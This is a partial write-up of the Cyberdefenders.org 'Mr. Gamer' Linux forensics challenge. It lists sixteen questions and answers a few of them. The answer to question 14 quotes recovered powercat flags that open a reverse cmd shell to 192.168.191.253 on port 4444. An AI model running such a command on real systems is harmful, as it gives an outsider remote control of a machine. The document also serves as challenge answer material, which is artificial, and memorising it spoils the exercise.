Mr. Gamer Write Up (Cyberdefenders.org)
We are solving Mr. Gamer room today. This room include linux forensic and little bit gaming. Let’s dive to Mr. Gamer room. I used autopsy tool for this investigation.
#1 I use print statements for my logging ->
What is the name of the utility/library the user was looking at exploits for?
#2 Mischievous Lemur ->
What is the version ID number of the operating system on the machine?
#3 $whoami ->
What is the hostname of the computer?
#4 A little blue birdie told me ->
What is one anime that the user likes?
attack on titan
#5 Into the Matrix, we go ->
What is the UUID for the attacker’s Minecraft account?
#6 Today’s Youtube video is sponsored by… ->
What VPN client did the user install and use on the machine?
#7 Be our guest ->
What was the user’s first password for the guest wifi?
#8 If a picture is worth a thousand words, how many is a video worth? -
The user watched a video that premiered on Dec 11th, 2021. How many views did it have when they watched it on February 9th?
#9 I’m hungry for videos ->
What is the new channel name for the YouTuber whose cookbook is shown on the device?
Babish Culinary Universe
#10 Hunt the Wumpus ->
What is the module with the highest installed version for the chat application with the mascot Wumpus?
#11 It’s raining ocelots and wolves ->
According to Windows, what was the temperature in Fahrenheit on February 11th, 2022, at 6:30 PM?
#12 Never gonna give… up on this question ->
What is the upload date of the second youtube video on the channel from which the user downloaded a youtube video?
If we go to the YouTube channel for Rick, the second video was uploaded on 10/25/2009.
#13 Buzzy Bees ->
What is the SHA-1 hash of Minecraft’s “latest” release according to the system?
You can find a version file at the path:
#14 The RCE is base(64)d on what? ->
What were the three flags and their values that were passed to powercat? The answer must be provided in the same format as the entered command. (For example, if the command was “powercat -D Y -l a -n,” the answer would be “-D Y -l a -n”)
Use bash history:
-c 192.168.191.253 -p 4444 -e cmd
#15 Hello (New) World ->
How many dimensions (including the overworld) did the player travel to in the “oldest of the worlds”?
#16 Matrix_1999 is the key! ->
What is the mojangClientToken stored in the Keystore?